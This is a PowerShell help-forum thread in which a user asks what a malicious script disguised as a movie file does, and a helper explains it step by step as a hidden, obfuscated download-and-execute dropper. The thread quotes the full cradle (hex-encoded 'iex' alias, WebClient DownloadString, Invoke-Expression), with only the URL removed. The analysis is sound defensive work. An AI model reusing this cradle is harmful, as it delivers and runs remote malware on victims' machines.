need help with identifying actions of a malicious code

Welcome Forums General PowerShell Q&A need help with identifying actions of a malicious code

This topic contains 2 replies, has 2 voices, and was last updated by

2 months, 3 weeks ago.

  • Author
  • #162461

    Topics: 1
    Replies: 1
    Points: 19
    Rank: Member

    I'm looking for clues here.  Long story short, one of our users ran what he thought was a movie file on his company laptop.  But the file isn't a actually a movie but a Powershell script.  Well said he double-clicked on the "movie file" but nothing happened, but I suspect something did happen.

    Script is below:

    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy UnRestricted -Windo 1 $ag=[string][char[]]@(0x69,0x65,0x58) -replace ' ',";sal s $ag;$nq=((New-Object Net.WebClient)).DownloadString('httpp://');s $nq


    Could the experts chime in and tell me what this script does or attempt to do?  I did check on the URL "" in the script and it points to a link to a text file.  I'm assuming it's a text file that the script will use?

  • #162513

    Topics: 1
    Replies: 302
    Points: 144
    Helping Hand
    Rank: Participant

    Let's break it down:

    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy UnRestricted -Windo 1 

    This runs powershell.exe in a hidden Window with ExecutionPolicy set to UnRestricted, which allows unsigned scripts to be run.

    $ag=[string][char[]]@(0x69,0x65,0x58) -replace ' ',"

    This sets the variable $ag to ieX, which is an alias for the Invoke-Expression cmdlet.

    sal s $ag

    sal is an alias for Set-Alias.
    s is now an alias for Invoke-Expression

    $nq=((New-Object Net.WebClient)).DownloadString('[removed]')

    This sets the $nq variable to the content of the text file.

    s $nq

    This runs Invoke-Expression against the text that was previously downloaded.

    Without knowing the content of the text file it's not possible to tell what happened next. My guess would be it's some kind of dropper for malware, possibly ransomware.

    You should consider the machine compromised, remove it from the network and rebuild it.

  • #162519

    Topics: 1
    Replies: 1
    Points: 19
    Rank: Member

    Thanks for the explanation.  You were right, the "text file" is a dropper trojan.  I've directed user to do a complete antivirus scan of his C: drive and it detected the text file as a dropper trojan.

You must be logged in to reply to this topic.